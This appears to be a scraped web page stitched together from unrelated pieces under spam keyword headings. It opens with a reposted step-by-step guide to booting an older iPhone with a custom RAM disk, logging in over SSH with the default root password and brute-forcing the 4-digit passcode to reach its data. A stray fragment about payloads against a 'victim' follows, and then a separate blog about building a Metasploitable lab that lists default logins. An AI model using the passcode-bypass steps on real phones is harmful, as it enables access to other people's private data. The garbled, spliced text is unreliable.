“My buddy Aamir Lakhani is developing a iOS security class and recently posted about hacking iOS devices. This is a very popular subject and want to share this. Also shout out to Tom Bedwell for his assistance with the research. You can find the original posting at www.cloudcentrics.com”

1. Kali Linux Android Hack
2. Mac Address Download
3. Hack Iphone With Mac Address Kali Linux Windows 10
4. Mac Address Changer
5. Kali Linux Hacking Codes

iOS devices can be booted with their own kernel and micro operating systems instead of approved Apple firmware. When iOS devices are loaded with a micro kernel, you can run attacks such as bypassing the passcode, decrypting passwords, copying file systems, viewing emails and much more. The following guide describes how to create a RAM DISK, however it may not function precisely as a step-by-step instruction set, since each system is unique and requires some level of customization.

How To Bypass Mac adress Filtering In Wifi Windows in Hindi Full Wifi Hacking Course Hss HubThings you will get to know in this Video:-1. Step 1- Open terminal in Kali Linux. Type ifconfig and note down your ip address. If your victim is in the same network in which you are, you need to use this ip address as lhost while creating payload and setting up listener. If your victim is on the internet, you need to.

Note: If you run in to trouble when creating a RAM DISK due to unique OS configurations and code versions, don’t despair.

If you want to take the easy way

Download: http://cloudcentrics.com/wp-content/uploads/2012/11/iphone-dataprotection-modifed.zip

– and then complete step 11 then proceed to step 20.

Now let the real fun begin

IMPORTANT: Watch the word wrap. Many commands are single line and may be wrapped on multiple lines.

Step 1: Uninstall file system readers

If you have a system tool such as MacFuse or Tuxera, uninstall the program before starting and reboot your machine.

Step 2: Install Xcode from the Mac App Store

Step 3: Download and install Xcode Command Line Tools:

1. Download Xcode from the Apple App Store
2. Launch Xcode and go to preferences
3. Install Xcode Command Line tools and Simulators

Step 4: Open the Terminal App.

Make sure you are in your home directory. In my case the home directory is /Users/alakhani
ldid is used to self-sign pieces for the code that we will upload to the iPhone

1. curl -O http://networkpx.googlecode.com/files/ldid
2. chmod +x ldid
3. sudo mv ldid /usr/bin/

Step 6: install Fuse

1. First verify what the latest version of Fuse (go to http://osxfuse.github.com). This posting is on 2.5.4. You do not need to download from here. We will download it via command line.

Fuse is an extension that allows Mac OS X to read non native file systems.

2. curl -O -Lhttps://github.com/downloads/osxfuse/osxfuse/OSXFUSE-2.5.4.dmg

3. hdiutil mount OSXFUSE-2.5.4.dmg
4. sudo installer -pkg “/Volumes/FUSE for OS X/Install OSXFUSE 2.5.pkg” -target /

You will see this once it installs:

5. sudo hdiutil eject “/Volumes/FUSE for OS X/”

Step 6: Download and install Python packages

Mac OS X 8.X comes preloaded with Python. However, we will still need to add some Python packages.

1. sudo ARCHFLAGS=’-arch i386 -arch x86_64′ easy_install pycrypto2. sudo easy_install M2crypto construct progressbar

2. sudo easy_install M2crypto construct progressbar

Step 7: Download and install Mercurial

1. Go to http://mercurial.selenic.com/
2. Download and install Mercurial, 2.4 or later

Step 8: Download iPhone Data Protection Utilities

1. hg clone https://code.google.com/p/iphone-dataprotection/(note if the command does not work you did not install Mercurial).

2. cd iphone-dataprotection

Step 9: Create script to encrypt and decrypt ramdisk kernal

Compile img3fs.c. This script is used to encrypt and decrypt Ramdisk and kernel patch.

I ran into issues and had to change the compiler path. You can change this by editing the makefile in the img3fs folder.

1. make -C img3fs/

Step 10: Download Redsn0w

Verify the latest version of Redsn0w. At the time of writing 0.9.15b3 is the latest version.

You can verify the latest version by going to: http://www.iphonehacks.com/download-redsn0w – No reason to download it here. We will retrieve it directly to our working directory using command line

3. curl -O -L https://sites.google.com/a/iphonedev.com/files/home/redsn0w_mac_0.9.15b3.zip

4. unzip redsn0w_mac_0.9.15b3.zip

You will now copy the encryption keys

Step 11: Download iOS firmware

You will need a copy of iOS firmware for your device that is jaill breakable. That can be found at http://www.getios.com

NOTE: This requires a jail breakable iOS firmware and device. iPhone 5 is not supported at the time of posting.

Step 12: Copy iOS firmware from your downloads folder (or where saved) to your iPhone Data Protection Folder

Step 13: Create a patch kernel and shell script

python python_scripts/kernel_patcher.py iPhone3,3_5.1.1_9B206_Restore.ipsw

Step 15 : Create RAM DISK

sh ./make_ramdisk_n92ap.sh

Step 16 : iOS SDK Not Found

The links for iOS SDKs have been changed.

1. Find where your iOS SDK is by typing the following command: xcode-select -print-path
2. edit the make_ramdisk_n92ap.sh file

Change the following:

(Old)

“/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS$VER.sdk/System/Library/Frameworks/IOKit.framework/IOKit” ];

(New) Change it to the relevant path of your SDK

“Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS6.0.sdk/System/Library/Frameworks/IOKit.framework/IOKit” ];

(Old)

./build_ramdisk.sh iPhone3,3_5.1.1_9B206_Restore.ipsw 038-4361-021.dmg 28db49d00990ced317a7bcd24755b3426bb246cb135111126d8b3f7bb8ba9252 c248e221c08ece5862fea42a58dad552 myramdisk_n92ap.dmg

(New) – Change it to the relevant ipsw you downloaded

./build_ramdisk.sh iPhone3,3_5.1.1_9B206_Restore.ipsw 038-4361-021.dmg 28db49d00990ced317a7bcd24755b3426bb246cb135111126d8b3f7bb8ba9252 c248e221c08ece5862fea42a58dad552 myramdisk_n92ap.dmg

Step 17 : Change Symbolic Link

Use symbolic link: sudo ln -s /Applications/Xcode.App/Contents/Developer /

Step 18 : Run script again

Run the make command again: sudo sh ./make_ramdisk_n92ap.sh

(Important: make sure you run it as sudo)

Note: If you skipped the earlier steps, or could not get step 18 to build a RAM Disk you can download a pre-created version of the RAM DISK. The pre-created version of the file can be found here:http://cloudcentrics.com/wp-content/uploads/2012/11/iphone-dataprotection-modifed.zip

After you download the pre-created RAM disk you can move to step 20.

You will also need to download a copy of a jail breakable iOS described in step 11.

Step 20 : Load RAM Disk

Make sure device is plugged in. Make sure device is turned off. Device needs to be plugged in BEFORE it is turned off.

Run the following command:

sudo ./redsn0w_mac_0.9.15b3/redsn0w.app/Contents/MacOS/redsn0w -i iPhone3,3_5.1.1_9B206_Restore.ipsw -r myramdisk_n90ap.dmg -k kernelcache.release.n90.patched

(Note: You will need to change the iPhone firmware name to the one appropriate for your device).

You will also need to change to the correct version and path of redsn0w.

Step 21 : Following On Screen Instructions

Lastly, you will want to wait a minute until you see the OK on the screen.

Step 22 : USB MUX

Next establish a connection from your computer to phone. Its done using a reverse SSH connection thru our USB cable. Essentially, its the same way iTunes communicates with the iPhone over USB. The process is called USB Multiplexing. It establishes a TCP connection over USB using SSL.

From your terminal screen on the Mac run the following command:

(note: open a new terminal tab)

python usbmuxd-python-client/tcprelay.py -t 22:2222 1999:1999

Step 23: SSH into the phone

Open a new terminal tab

SSH into the phone

Type the following command:

ssh -p 2222 [email protected]

password: alpine

Step 24 : Following On Screen Instructions

Open a New terminal tab on your Mac:

Type the following command:

python python_scripts/demo_bruteforce.py

(when you are prompted to provide the device’s passcode – leave blank)

Run the brute force password cracker. It will pre-configured to brute force any 4-digit simple password. It will make approximately 25 minutes to run thru all possible combination. You can modify the script to crack more complex passcodes and PINs.

In our case the passcode was “0111”

The script by default will brute force 4-digit passcodes. It will start of with “000″ then move onto “0001, 0002, 0003…” and so on. It takes approx. 25 minutes to cycle thru all 10,000 combinations and reach 9999.

Step 25 : reboot

Go to your SSH tab of your phone

Issue the command: reboot

References:

I wanted to thank Satish at http://resources.infosecinstitute.com/iphone-forensics/ for his post and work he did on the same topic. In the above article you will find my modifications since I was running OS X 10.8.2 and a newer version of Xcode.

However, I encourage everyone to check out http://resources.infosecinstitute.com/iphone-forensics/ and read the instructions and watch Satish’s YouTube video at http://www.youtube.com/watch?feature=player_embedded&v=hp-Mrw4yo9o

I’m not a hacker, I don’t see the good that can come from it really. But, I do want to know how to do it so I can take necessary precautions. Also, I read about hacking and wonder sometimes if it really is possible these days. The attack vector which exploits the vulnerabilities of humans, like I’ve said before do not interest me so much. I am more interested in these two attack vector types:

• A network and/or server that has the proper security tools and hardware but are incorrectly configured or installed
• A network and/or server that has the proper security tools and hardware which are correctly configured and installed but still have a vulnerability

A good place to start is with the Kali Linux Metasploit penetration toolkit which you can get and learn about here.

Figure 1, Kali Linux Metasploit toolkit

Those tools are cool, but you need something to use them on. Knowing that hacking is illegal, I read someplace that even scanning endpoints for vulnerabilities, even if you don’t exploits them has some serious consequences. I therefore have built a instance of Metasploitable which I downloaded from Rapid7. I must admit, that I wanted to use Microsoft products to make this happen, but suffered some real setbacks when I was doing it. I made it through most of them but finally met my match when trying to get the Metasploitable server to get an IP address while running in Hyper-V. Yes, I did convert the VMDK to a VHD and all. I simply wasn’t and still not so skilled with Linux to get the eth0 configuration to show an IP address. So I downloaded, installed and configured VirtualBox with the VMDK and it worked like a snap. Figure 2 shows VirtualBox and Figure 3 shows what I had been after for a few months, actually, my first attempt at this was over a year ago. I must have really wanted this, yes, indeed I did.

Figure 2, VirtualBox running Metasploitable

Figure 3, Metasploitable login screen and ifconfig

Note to self, I do not remember making a configuration to add Metasploitable to a different subnet than my other raspberry pi’s I am am going to use for running Kali. The pi’s were 192.168.1.2 – 192.168.1.10, somehow metasploitable00 got 10.0.2.15 like I show in Figure 3, not sure if this will cause me some more headaches, but I remain optimistic that my controller pi and Kali pi will find it when I do an NMAP. In case you are interested, I created a raspberry pi cluster which I documented here.

Just for my general recollection:

Well, it turns out that the default IP configuration for a VM running with VirtualBox is to use Network Address Translation (NAT). This is helpful and useful when I want my VM to make outbound connections (in this case I do not) and not useful when I want to access the VM from other machines on on my network (this is what I need/want to do). The default IP for this is what I quoted earlier, 10.0.2.15. As you can see in Figure 4, NMAP from my controller cannot find this one, so I will need to make some configuration and implement Bridged Networking which is apparently what I need.

Figure 4, NMAP from my raspberry pi node cluster controller

Let’s do this and hope it works out. I shutdown the VM and changed the Network settings as shown in Figure 5. My host machine is connecting to the network using wireless, you can see in Figure 5 that Cable Connection is unchecked, I assume that is what it means. Let’s press OK and see what happens.

Figure 5, setting the Network Adaptor on my VirtualBox Metasploitable VM

No go, memories of my Hyper-V trials and hardships are beginning to return to my memory. Let’s connect a cable and see if that changes anything. Finger crossed! I’m going to go ahead and shutdown the host running the VM as well before I insert the ethernet (RJ-45) cable. Nope, here we go again….wait I forgot to check that Cable Connection box. Holy smokes, let go, Figure 6 shows it got the 192.168.1.13 IP address allocated.

Figure 6, Bridged Networking configured with a Metasploitable VM using VirtualBox on Windows 10

Well, that did work and am happy about that. As you can see in Figure 7 something is a little weird with the IPs. IP address 192.168.1.12 should be the address of win00, 192.168.1.13 is a good number for METASPLOITABLE, lucky number 13. It weird because the MAC address for win00 is the one for metasploitable00 and the MAC address of win00 is the one shown for METASPLOITABLE. I’ll need to check this out and see what’s going on. 192.168.1.13 does have SSH enabled so this has to be the metasploitable00 VM because I tried the same for win00 (192.168.1.12) and it timed out because SSH is not yet enabled on that machine. I can fix this, it’s just surprising because I only know because I know, no one else would know without having set this up…

Figure 7, NMAP and Router IP configuration

If I look at the list it turns out node06 didn’t connect. Also, when I changed node00 to connect via wireless, using these instructions from wired, it got a new IP address and I needed to delete and re-add the address reservation in the router. All is good with node00 and node06 now, both have a static / reserved IP address. When I swap out the OS image on node07 where I will run the Metasploit toolkit with Kali Linux I get the same IP address as I got when it was running the Raspbian OS, this kind of confirms that the IP allocation is based on MAC Address, which I suspected before and now believe to be most probably true.

Kali Linux Android Hack

I enabled SSH, IIS and SMB 1.0 on win00 since I might want to do some hacking of the Windows 10 host at some point in the future. I used the Windows Feature from the Control Panel to install those drivers and programs, as seen in Figure 8.

Figure 8, Installing some protocols that expose a network endpoint for future hacking opportunities

I can’t figure out the IP address allocation logic with win00 and METASPLOITABLE. There is one IP address 192.168.1.12 which is linked to the “Wireless LAN adapter Wi-Fi” configuration when I look at the ipconfig. While 192.168.1.13 is the “Ethernet adapter Ethernet”. METASPLOITABLE is allocated 192.168.1.14 and I was able to SSH to it from y controller, I haven’t tried from Kali yet, but will do it first thing when I’m ready to doing some labs. I feel like the infrastructure is setup now and once I get some time I can start getting to it.

Some helpful Linux commands:

ifconfig

ssh userid@192.168.1.?

sudo shutdown –h now

Mac Address Download

sudo reboot –h now

pi/raspberry

Hack Iphone With Mac Address Kali Linux Windows 10

kali/kali

Mac Address Changer

METASPLOITABLE/kali

Kali Linux Hacking Codes